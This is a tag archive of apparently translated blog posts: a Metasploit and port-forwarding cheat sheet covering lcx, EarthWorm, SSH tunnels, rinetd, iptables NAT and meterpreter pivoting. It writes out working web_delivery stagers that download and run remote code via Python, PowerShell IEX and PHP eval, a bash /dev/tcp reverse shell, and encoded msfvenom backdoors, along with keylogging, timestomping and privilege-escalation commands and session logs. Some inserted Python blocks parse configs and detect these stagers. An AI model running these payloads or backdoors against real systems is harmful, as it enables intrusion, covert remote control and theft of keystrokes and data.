Tag archive: meterpreter

A survey of port forwarding tools

In day-to-day penetration testing, once you have obtained control of a machine, the most common way to reach a port on another host in that machine's internal network is port forwarding, for example forwarding 3389 out to a public VPS. Below are the commonly used tools on each platform.

Windows

1) lcx
Public VPS:
lcx -listen 2222 3333
2222 is the forwarding port; 3333 is any unused port on the VPS

Test machine:
lcx -slave x.x.x.x 2222 127.0.0.1 3389

2) EarthWorm
Public VPS:
ew_for_Win.exe -s lcx_listen -l 10800 -e 8080

Test machine:
E:\>ew_for_Win.exe -s lcx_slave -d 192.168.190.201 -e 8080 -f 192.168.192.144 -g 22

Linux

1) SSH tunnel
Local port forwarding
ssh -qTfnN -L port:host:hostport user@remote_ip # forward tunnel, listens on the local port
Parameter details:

-q Quiet mode.
-T Disable pseudo-tty allocation. No shell is allocated.
-f Requests ssh to go to background just before command execution. Runs in the background; adding -n as well is recommended.
-N Do not execute a remote command. No remote command is run; this is the option to use for pure port forwarding.

Suppose host1 is the local host and host2 is a remote host. For whatever reason these two hosts cannot reach each other, but a third host, host3, can reach both of them.
On host1 we run the following command:

[vincent@vincent rinetd]$ ssh -qTfnN -L 2345:192.168.192.120:22 root@172.16.100.167

Where:
host2 IP: 192.168.192.120
host3 IP: 172.16.100.167
The -L option takes three colon-separated values: "local port:target host:target host port".
Now check what host1 is listening on:

[vincent@vincent rinetd]$ netstat -ano | grep 2345
tcp 0 0 127.0.0.1:2345 0.0.0.0:* LISTEN off (0.00/0/0)

Connecting to local port 2345 now reaches host2's SSH service.

Remote port forwarding
ssh -qTfnN -R port:host:hostport user@remote_ip # reverse tunnel, used to get past firewall restrictions from inside an internal network
host1 IP: 192.168.192.120
host2 IP: 172.16.100.167
host1 and host2 cannot reach each other and must go through host3. But suppose host3 is an internal machine: it can connect out to host1 on the public network, while the reverse is not possible, and host1 on the public network cannot connect in to host3.
On host3 we run the following command:

ssh -qTfnN -R 2345:172.16.100.167:22 root@192.168.192.120

Here 2345 is the listening port on host1 and 22 is the forwarded port on host2.
Now look at host1's listening port:

[root@server120 rinetd]# netstat -ano | grep 2345
tcp 0 0 127.0.0.1:2345 0.0.0.0:* LISTEN off (0.00/0/0)

Connecting with ssh to local port 2345 now reaches host2's ssh service.
Look at the process on host3:

[root@vincent rinetd]# ps axu | grep ssh | grep 2345
root 80061 0.0 0.1 62296 1288 ? Ss 12:58 0:00 ssh -qTfnN -R 2345:172.16.100.167:22 root@192.168.192.120

And the corresponding connection:

[root@vincent rinetd]# netstat -anlp | grep 80061
tcp 0 0 172.16.100.134:58166 192.168.192.120:22 ESTABLISHED 80061/ssh

2) EarthWorm
Public VPS:

./ew -s lcx_listen -l 10800 -e 888

Test machine:

./ew_for_linux64 -s lcx_slave -d 198.98.112.112 -e 888 -f 192.168.192.144 -g 8888

3) meterpreter

meterpreter > portfwd add -l 4444 -p 3389 -r 172.16.100.131
[*] Local TCP relay created: 0.0.0.0:4444 <-> 172.16.100.131:3389

meterpreter > portfwd add -L 172.16.0.20 -l 2323 -p 80 -r 7.7.7.20
[*] Local TCP relay created: 172.16.0.20:2323 <-> 7.7.7.20:80

4) rinetd

wget http://www.boutell.com/rinetd/http/rinetd.tar.gz
tar -zxvf rinetd.tar.gz

[root@vincent rinetd]# make
cc -DLINUX -g -c -o rinetd.o rinetd.c
rinetd.c:176: 警告:与内建函数‘log’类型冲突
cc -DLINUX -g -c -o match.o match.c
gcc rinetd.o match.o -o rinetd

[root@vincent rinetd]# make install
install -m 700 rinetd /usr/sbin
install -m 644 rinetd.8 /usr/man/man8
install: 无法创建普通文件"/usr/man/man8": 没有那个文件或目录
make: *** [install] 错误 1

If make fails, change bindPort >= 65536 and connectPort >= 65536 in rinetd.c to 65535; otherwise make reports that the value exceeds the system's maximum port number.
Create the /usr/man/ directory by hand

[root@vincent rinetd]# make install
install -m 700 rinetd /usr/sbin
install -m 644 rinetd.8 /usr/man/man8

Create the configuration file /etc/rinetd.conf. Each line has the format: source IP, source port, destination IP, destination port. Let's add one rule:

allow 192.168.190.201 # only this IP may connect
0.0.0.0 2222 192.168.192.122 3389
[root@vincent rinetd]# ./rinetd -c /etc/rinetd.conf

Check the local listening port

[root@vincent rinetd]# netstat -ano | grep 2222
tcp 0 0 0.0.0.0:2222 0.0.0.0:* LISTEN off (0.00/0/0)

Now connecting from 192.168.190.201 to port 2222 on this machine logs you in to the remote desktop of 192.168.192.122.
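As an added example, not part of the original post: a Python parser for the rinetd.conf format described above, with the port range check that the rinetd.c patch is about and rinetd's allow/deny scoping (allow and deny lines before the first forward are global, later ones attach to the forward that precedes them). The sample configuration is constructed, modelled on the one created above, and the function names are my own.

```python
import fnmatch

# Constructed sample, modelled on the /etc/rinetd.conf built above (not a real file).
SAMPLE_CONF = """\
allow 192.168.190.201        # global: only this client may use any forward
0.0.0.0 2222 192.168.192.122 3389
127.0.0.1 2223 192.168.192.122 22
allow 10.0.0.*               # rule-specific: applies to the forward directly above
0.0.0.0 70000 192.168.192.122 80
"""

def _port(text):
    port = int(text)
    if not 1 <= port <= 65535:        # the bound the rinetd.c patch above is about
        raise ValueError("port %d out of range" % port)
    return port

def parse_rinetd(text):
    """Return (rules, global_acl, errors); allow/deny lines before the first forward are
    global, later ones attach to the forward that precedes them, as rinetd does."""
    rules, global_acl, errors = [], {"allow": [], "deny": []}, []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.split("#", 1)[0].split()       # drop comments and blank lines
        if not parts:
            continue
        if parts[0] in ("allow", "deny"):
            if len(parts) != 2:
                errors.append("line %d: bad acl line" % lineno)
                continue
            scope = rules[-1] if rules else global_acl
            scope[parts[0]].append(parts[1])
            continue
        try:
            if len(parts) != 4:
                raise ValueError("expected 4 fields, got %d" % len(parts))
            rules.append({"bind": parts[0], "bind_port": _port(parts[1]),
                          "to": parts[2], "to_port": _port(parts[3]),
                          "allow": [], "deny": []})
        except ValueError as exc:
            errors.append("line %d: %s" % (lineno, exc))
    return rules, global_acl, errors

def is_allowed(client_ip, rule, global_acl):
    """Approximates rinetd: any deny match rejects; if allow patterns exist, one must match."""
    allow = global_acl["allow"] + rule["allow"]
    deny = global_acl["deny"] + rule["deny"]
    if any(fnmatch.fnmatchcase(client_ip, p) for p in deny):
        return False
    return not allow or any(fnmatch.fnmatchcase(client_ip, p) for p in allow)

def unrestricted_forwards(rules, global_acl):
    """Forwards bound on every interface with no allow list at all: worth a second look."""
    return [r for r in rules
            if r["bind"] == "0.0.0.0" and not (global_acl["allow"] or r["allow"])]
```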

5) iptables
Requires root privileges
First enable IP forwarding in the kernel

[root@linux-node1 ~]# vim /etc/sysctl.conf
..........
net.ipv4.ip_forward = 1

PREROUTING performs destination address translation: it rewrites the public IP that outside hosts connect to into your internal IP, so they can reach the internal machine protected by the firewall.
POSTROUTING performs source address translation: it rewrites your internal address into a public address so you can reach the Internet.
Source sends data -> {PREROUTING -> routing decision -> POSTROUTING} -> destination receives data

Here, traffic to port 1080 on 192.168.192.120 is redirected to port 22 on 192.168.192.144

iptables -t nat -A PREROUTING -p tcp -m tcp --dport 1080 -j DNAT --to-destination 192.168.192.144:22 
iptables -t nat -A POSTROUTING -d 192.168.192.144 -p tcp -m tcp --dport 22 -j SNAT --to-source 192.168.192.120

 

[root@server120 source]# iptables -t nat -L -vn
Chain PREROUTING (policy ACCEPT 505 packets, 93775 bytes)
pkts bytes target prot opt in out source destination 
1 52 DNAT tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:1080 to:192.168.192.144:22

Chain POSTROUTING (policy ACCEPT 31 packets, 1739 bytes)
pkts bytes target prot opt in out source destination 
1 52 SNAT tcp -- * * 0.0.0.0/0 192.168.192.144 tcp dpt:22 to:192.168.192.120

Chain OUTPUT (policy ACCEPT 31 packets, 1739 bytes)
pkts bytes target prot opt in out source destination

 

Flush the nat table

iptables -t nat -F
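As an added example (my own code, not the author's or the iptables project's), a Python model of the two chains described above: it parses the two iptables rules exactly as written in this section and walks a constructed client connection through PREROUTING (DNAT) and then POSTROUTING (SNAT), so you can see which rule rewrites which address. It models only new connections on the forwarder; conntrack, which reverses the translation for reply packets, is left out.

```python
import shlex

# The two nat rules from this section, used as constructed input; no live firewall is touched.
RULES = [
    "iptables -t nat -A PREROUTING -p tcp -m tcp --dport 1080 -j DNAT --to-destination 192.168.192.144:22",
    "iptables -t nat -A POSTROUTING -d 192.168.192.144 -p tcp -m tcp --dport 22 -j SNAT --to-source 192.168.192.120",
]
# Constructed client connection to port 1080 on the forwarder, as in the section above.
CLIENT_PKT = {"src": "192.168.190.201", "dst": "192.168.192.120", "dport": 1080}

def parse_rule(cmd):
    """Pick chain, match fields and target out of an iptables command line (only the
    options used above are understood: -A, -d, --dport, -j, --to-destination/--to-source)."""
    argv = shlex.split(cmd)
    rule = {"chain": None, "dport": None, "dst": None, "target": None, "to": None}
    for i, arg in enumerate(argv[:-1]):
        nxt = argv[i + 1]
        if arg == "-A":
            rule["chain"] = nxt
        elif arg == "--dport":
            rule["dport"] = int(nxt)
        elif arg == "-d":
            rule["dst"] = nxt
        elif arg == "-j":
            rule["target"] = nxt
        elif arg in ("--to-destination", "--to-source"):
            rule["to"] = nxt
    return rule

def _matches(rule, pkt):
    return rule["dport"] in (None, pkt["dport"]) and rule["dst"] in (None, pkt["dst"])

def apply_nat(rules, pkt):
    """Walk a new connection through PREROUTING (DNAT) and then POSTROUTING (SNAT); the first
    matching rule in each chain wins. Returns the rewritten packet and the rules that fired."""
    pkt, fired = dict(pkt), []
    for chain in ("PREROUTING", "POSTROUTING"):
        for rule in rules:
            if rule["chain"] != chain or not _matches(rule, pkt):
                continue
            host, _, port = rule["to"].partition(":")
            if rule["target"] == "DNAT":      # rewrite where the packet is going
                pkt["dst"] = host
                if port:
                    pkt["dport"] = int(port)
            elif rule["target"] == "SNAT":    # rewrite where it appears to come from
                pkt["src"] = host
            fired.append("%s/%s" % (chain, rule["target"]))
            break
    return pkt, fired
```

Because of the SNAT step, 192.168.192.144 sees every forwarded connection as coming from 192.168.192.120, so its own logs no longer show the real client address; the forwarder's nat table (iptables -t nat -L -vn) is where the original source has to be looked up.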

 

A use case for port forwarding:

If the public VPS has no msf installed, we can use the port forwarding feature of an SSH tunnel to work with the local msf.
First change the VPS configuration
Edit /etc/ssh/sshd_config
Append at the end of the file:
GatewayPorts yes
GatewayPorts specifies whether remote hosts are allowed to connect to ports forwarded on the local side. The default is "no".
By default sshd binds remote port forwards to the loopback address, which prevents other remote hosts from connecting to the forwarded port.
The GatewayPorts directive lets sshd bind remote port forwards to a non-loopback address, so that remote hosts can connect.

First run locally

ssh -qTfnN -R 2345:172.16.100.128:2345 root@172.16.100.134

This forwards local port 2345 to port 2345 on 172.16.100.134.
Check the connections on 172.16.100.134

[root@vincent rinetd]# netstat -anlp | grep 2345
tcp 0 0 0.0.0.0:2345 0.0.0.0:* LISTEN 83417/sshd

Port 2345 is listening on 0.0.0.0; with the default GatewayPorts no it would listen on 127.0.0.1 and accept local connections only.
Next we generate a backdoor

root@kali-vincent:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=172.16.100.134 LPORT=2345 -f exe -o abc.exe

Running this backdoor on the Windows machine then gives us a meterpreter session directly on the local msf.
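As an added example (not from the original post), a small Python audit that ties the SSH tunnel section and the GatewayPorts case together from the defender's side: it reads the effective GatewayPorts value from sshd_config (sshd keeps the first occurrence), lists LISTEN sockets bound to every interface from netstat -anlp output, and recovers -L/-R tunnels from ps axu output. The config, netstat and ps samples are constructed, modelled on the outputs shown above; the function names are my own.

```python
import re

# Constructed samples modelled on the outputs shown on this page (not taken from a real host).
SSHD_CONFIG = """\
Port 22
#GatewayPorts no
GatewayPorts yes
"""
NETSTAT = """\
tcp 0 0 0.0.0.0:2345 0.0.0.0:* LISTEN 83417/sshd
tcp 0 0 127.0.0.1:2346 0.0.0.0:* LISTEN 83418/sshd
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1021/sshd
tcp 0 0 0.0.0.0:2222 0.0.0.0:* LISTEN 1494/rinetd
"""
PS = """\
root 80061 0.0 0.1 62296 1288 ? Ss 12:58 0:00 ssh -qTfnN -R 2345:172.16.100.167:22 root@192.168.192.120
vincent 80099 0.0 0.1 62296 1288 ? Ss 13:02 0:00 ssh -qTfnN -L 2345:192.168.192.120:22 root@172.16.100.167
"""

LISTEN_RE = re.compile(r"^tcp6?\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+LISTEN\s+(\d+)/(\S+)")
SSH_FWD_RE = re.compile(r"\s-([LR])\s*(\d+):([\w.\-]+):(\d+)")

def gateway_ports(config_text):
    """Effective GatewayPorts value: sshd keeps the first match and defaults to 'no'."""
    for line in config_text.splitlines():
        parts = line.split("#", 1)[0].split()  # drop comments
        if len(parts) == 2 and parts[0].lower() == "gatewayports":
            return parts[1].lower()
    return "no"

def wide_open_listeners(netstat_text, ignore_ports=(22,)):
    """LISTEN sockets bound to all interfaces (0.0.0.0 or ::) as (port, pid, program)."""
    found = []
    for line in netstat_text.splitlines():
        m = LISTEN_RE.match(line)
        if m and m.group(1) in ("0.0.0.0", "::") and int(m.group(2)) not in ignore_ports:
            found.append((int(m.group(2)), int(m.group(3)), m.group(4)))
    return found

def ssh_forwards(ps_text):
    """ssh -L/-R tunnels from ps axu output as (pid, kind, listen_port, host, host_port)."""
    out = []
    for line in ps_text.splitlines():
        cols = line.split(None, 10)  # the 11th column is the full command line
        if len(cols) == 11 and cols[10].startswith("ssh "):
            for kind, lport, host, hport in SSH_FWD_RE.findall(cols[10]):
                out.append((int(cols[1]), kind, int(lport), host, int(hport)))
    return out

def audit(config_text, netstat_text, ps_text):
    """Combine the three views into human-readable findings."""
    findings = []
    gp = gateway_ports(config_text)
    if gp != "no":
        findings.append("GatewayPorts %s: remote forwards are reachable from other hosts" % gp)
    for port, pid, prog in wide_open_listeners(netstat_text):
        findings.append("port %d bound on all interfaces by %s (pid %d)" % (port, prog, pid))
    for pid, kind, lport, host, hport in ssh_forwards(ps_text):
        findings.append("ssh pid %d: -%s %d -> %s:%d" % (pid, kind, lport, host, hport))
    return findings
```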

 

meterpreter command reference

Basic commands:
background # put meterpreter into the background
sessions -i number # interact with a session; number is the nth session
quit # exit the session
shell # get a command shell

meterpreter > shell
Process 320 created.
Channel 1 created.
Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\桌面>

 

cat c:\\boot.ini # view file contents
getwd # print the current working directory
upload /root/Desktop/netcat.exe c:\\ # upload a file to the target
download 0xfa.txt /root/Desktop/ # download a file to the local machine
edit c:\\boot.ini # edit a file
search -d d:\\www -f web.config # search for files
ps # list the running processes
migrate pid # migrate the Meterpreter session into the process with that pid

meterpreter > migrate 3552
[*] Migrating from 904 to 3552...
[*] Migration completed successfully.

execute -H -i -f cmd.exe # start a new cmd.exe process; -H hidden, -i interactive
getpid # get the pid of the current process
kill pid # kill a process
getuid # show the user the session is running as
sysinfo # show target system information such as hostname and OS
getsystem # privilege escalation
timestomp c:/a.doc -c "10/27/2015 14:22:11" # change the file's creation time

Keystroke logging:

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
whoami <Return> dir <Return>
meterpreter > keyscan_stop
Stopping the keystroke sniffer...

Port forwarding:

meterpreter > portfwd add -l 4444 -p 3389 -r 172.16.100.131
[*] Local TCP relay created: 0.0.0.0:4444 <-> 172.16.100.131:3389

Then check the local listener

root@kali-vincent:/usr/share/metasploit-framework/config# netstat -ano | grep 4444
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN off (0.00/0/0)

Internal network pivoting:

This is the most commonly used form of proxying in meterpreter; it lets you route your machine into the victim's internal network.
Add a new NIC to the Windows 2003 VM, set it to host-only mode, and configure it on a different subnet, 10.11.100.1, which kali cannot reach.

msf exploit(handler) > route add 10.11.100.1 255.255.255.0 3
[*] Route added
msf exploit(handler) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
10.11.100.1 255.255.255.0 Session 3

Alternatively, add the route directly from meterpreter

meterpreter > run autoroute -s 10.11.100.1
[*] Adding a route to 10.11.100.1/255.255.255.0...
[+] Added route to 10.11.100.1/255.255.255.0 via 172.16.100.131
[*] Use the -p option to list all active routes

Now other modules can be used against the internal network. If other applications also need to reach the internal network, use the auxiliary/server/socks4a module. Note that Proxychains does not support ICMP, so when running NMAP through the proxy use the -sT -Pn options.

msf auxiliary(smb_login) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > exploit
[*] Auxiliary module execution completed

[*] Starting the socks4a proxy server

Then check the listening port

root@kali-vincent:/usr/share/metasploit-framework/config# netstat -ano | grep 1080
tcp 0 0 0.0.0.0:1080 0.0.0.0:* LISTEN off (0.00/0/0)
vim /etc/proxychains.conf
add: socks4 127.0.0.1 1080

Then proxychains nmap -sS -v 10.11.100.1 can scan the internal network

Metasploit Web Delivery

Metasploit's Web Delivery module starts a server on Kali that serves content containing the payload.

Python


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/7UBHdklf
[*] Local IP: http://172.16.100.182:8080/7UBHdklf
[*] Server started.
[*] Run the following command on the target machine:
Python:
python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://172.16.100.182:8080/7UBHdklf');exec(r.read());"
root@kali:~# netstat -antlp | grep 8080
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 5657/ruby

Run that Python command on the test machine

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (42231 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7292) at 2017-09-14 17:39:42 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer : dell-PC
OS : Windows 7 (Build 7601, Service Pack 1)
Architecture : x64
System Language : zh_CN
Meterpreter : python/windows

Powershell


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/AwOpQNolkZNZz
[*] Local IP: http://172.16.100.182:8080/AwOpQNolkZNZz
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $z=new-object net.webclient;$z.proxy=[Net.WebRequest]::GetSystemWebProxy();$z.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $z.downloadstring('http://172.16.100.182:8080/AwOpQNolkZNZz');

 

Run that powershell command on the test machine

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (171583 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7336) at 2017-09-14 17:46:00 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

PHP


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload php/exec
payload => php/exec
msf exploit(web_delivery) > set target 1
target => 1
msf exploit(web_delivery) > set cmd "bash -i >& /dev/tcp/192.168.192.120/2345 0>&1"
cmd => bash -i >& /dev/tcp/192.168.192.120/2345 0>&1
msf exploit(web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)



Payload options (php/exec):

Name Current Setting Required Description
---- --------------- -------- -----------
CMD bash -i >& /dev/tcp/192.168.192.120/2345 0>&1 yes The command string to execute



Exploit target:

Id Name
-- ----
1 PHP



msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Using URL: http://0.0.0.0:8080/ZuvhhHCImHt5wT1
[*] Local IP: http://172.16.100.182:8080/ZuvhhHCImHt5wT1
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.100.182:8080/ZuvhhHCImHt5wT1'));"
msf exploit(web_delivery) > [*] 172.16.100.161 web_delivery - Delivering Payload

 

Catching the reverse shell

[root@server120 ~]# nc -vv -l -p 2345
Listening on any address 2345 (dbm)
Connection from 192.168.190.201:64671
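As an added example, not part of the original post: detection logic a defender can run over process-creation or shell-history logs to spot the web_delivery stagers and the bash reverse shell shown in this section. The log lines are constructed from the commands above plus benign entries, and the signature names are my own.

```python
import re

# Signatures for the stager one-liners shown in this section plus the bash reverse shell
# used as the php/exec CMD. They are deliberately loose on case, spacing and interpreter version.
SIGNATURES = {
    "python_urlopen_exec": re.compile(
        r"python[\d.]*\s+-c\s+.*urlopen\(.*\).*exec\(", re.I),
    "powershell_hidden_iex_download": re.compile(
        r"powershell(\.exe)?\s+.*-w(indowstyle)?\s+hidden.*\b(IEX|Invoke-Expression)\b"
        r".*download(string|file)", re.I),
    "php_eval_remote_file": re.compile(
        r"php\s+.*-r\s+.*eval\(\s*file_get_contents\(\s*['\"]https?://", re.I),
    "bash_dev_tcp_reverse_shell": re.compile(r"bash\s+-i\s+>&\s*/dev/tcp/\S+", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"]+")

# Constructed process-creation log: the commands from this section plus benign noise.
SAMPLE_LOG = [
    r'''python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://172.16.100.182:8080/7UBHdklf');exec(r.read());"''',
    r'''python3 -c "print('hello')"''',
    r"powershell.exe -nop -w hidden -c $z=new-object net.webclient;$z.proxy=[Net.WebRequest]::GetSystemWebProxy();$z.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $z.downloadstring('http://172.16.100.182:8080/AwOpQNolkZNZz');",
    r"powershell.exe -Command Get-Process",
    r'''php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.100.182:8080/ZuvhhHCImHt5wT1'));"''',
    r'''php -r "echo 1;"''',
    r"bash -i >& /dev/tcp/192.168.192.120/2345 0>&1",
]

def classify(cmdline):
    """Return (signature_name, staging_url_or_None) for a matching command line, else None."""
    for name, pattern in SIGNATURES.items():
        if pattern.search(cmdline):
            url = URL_RE.search(cmdline)   # the staging URL is the pivot for further hunting
            return (name, url.group(0) if url else None)
    return None

def scan(lines):
    """Run classify over a list of command lines; returns (line_index, name, url) hits."""
    hits = []
    for idx, line in enumerate(lines):
        result = classify(line)
        if result:
            hits.append((idx,) + result)
    return hits
```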

Metasploit Framework msfvenom

The msfvenom command-line options are:

Options:

-p, --payload <payload> Payload to use. Use '-' or stdin to specify a custom payload
-l, --list [module_type] List all available resources of the given module type. Types: payloads, encoders, nops, all
-n, --nopsled <length> Prepend a nopsled of the given length to the payload
-f, --format <format> Output format (use --help-formats for the list of formats msf supports)
-e, --encoder [encoder] Encoder to use
-a, --arch <architecture> Target architecture of the payload
--platform <platform> Target platform of the payload
-s, --space <length> Maximum size of the resulting payload
-b, --bad-chars <list> Characters to avoid, for example: '\x00\xff'
-i, --iterations <count> Number of times to encode the payload
-c, --add-code <path> Additional win32 shellcode file to include
-x, --template <path> Custom executable file to use as a template
-k, --keep Preserve the template's behaviour and run the injected payload as a new process
--payload-options List the payload's standard options
-o, --out <path> Save the payload to a file; ">" can be used instead
-v, --var-name <name> Custom variable name to use for certain output formats
--smallest Generate the smallest possible payload
-h, --help Show help

--help-formats lists the output formats msf supports

root@kali:/usr/share/metasploit-framework/modules/payloads/singles# msfvenom --help-formats
Executable formats
	asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
	bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

The -f format option can be abbreviated to a single uppercase letter:
for example, X stands for -f exe

[H]arp
[P]erl
Rub[Y]
[R]aw
[J]s
e[X]e
[D]ll
[V]BA
[W]ar
Pytho[N]

First look at the payloads. There are currently 437 of them, roughly grouped by platform (windows/linux/osx/android) and by language (python, php, and so on).
root@kali:~# msfvenom -l payloads

List the supported encoders
root@kali:~# msfvenom -l encoders
If you use the -b option (a set of bad characters to avoid), an encoder is invoked automatically.
Otherwise, select an encoder module with the -e option, for example:
./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw
The -i option encodes the payload several times over.
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe

Some usage demonstrations follow:
Kali: 172.16.100.182
Test machine: 172.16.100.155

Generating a PHP backdoor with msfvenom

List the php-related payloads

msfvenom -l payloads | grep php

Here we test with bind_php

php/bind_php Listen for a connection and spawn a command shell via php

View the configuration options

root@kali:~# msfvenom -p php/bind_php --payload-options

Generate the backdoor

msfvenom -p php/bind_php RHOST=172.16.100.155 R

Remove the leading /*
Visit http://172.16.100.155/1.php and check the listener

[root@vincenthostname html]# netstat -antlp | grep httpd
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 1494/httpd

 

msf > use multi/handler
msf exploit(handler) > set payload php/bind_php
payload => php/bind_php
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------



Payload options (php/bind_php):

Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address



Exploit target:

Id Name
-- ----
0 Wildcard Target



msf exploit(handler) > set rhost 172.16.100.155
rhost => 172.16.100.155
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started bind handler
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:43351 -> 172.16.100.155:4444) at 2017-09-14 15:57:11 +0800

 

Upgrade to Meterpreter

msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.100.182:4433 
[*] Sending stage (826840 bytes) to 172.16.100.155
[*] Meterpreter session 2 opened (172.16.100.182:4433 -> 172.16.100.155:43087) at 2017-09-14 15:58:49 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption
[*] Command stager progress: 100.00% (736/736 bytes)
msf exploit(handler) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell php/php 172.16.100.182:43351 -> 172.16.100.155:4444 (172.16.100.155)
2 meterpreter x86/linux uid=48, gid=48, euid=48, egid=48 @ 172.16.100.155 172.16.100.182:4433 -> 172.16.100.155:43087 (172.16.100.155)

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer : 172.16.100.155
OS : CentOS 6.5 (Linux 2.6.39)
Architecture : x64
Meterpreter : x86/linux

Generating a Java backdoor with msfvenom

List the payloads that can be used

msfvenom -l payloads | grep java

Here we use

java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.100.182 > /tmp/shell.jsp
Payload size: 1500 bytes

Visiting the page yields a reverse shell

msf > use multi/handler
msf exploit(handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:4444 -> 172.16.100.1:5509) at 2017-09-14 16:11:10 +0800
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

E:\tomcat\bin>whoami
whoami
dell-pc\dell

Generating a Windows backdoor with msfvenom


root@kali-vincent:/tmp# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe

Local listener:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.100.128
LHOST => 172.16.100.128
msf exploit(handler) > set LPORT 2345
LPORT => 2345
msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.100.128:2345 
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.128:2345 -> 172.16.100.1:56101) at 2016-03-20 16:08:55 +0800

meterpreter > sysinfo 
Computer : DELL-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : zh_CN
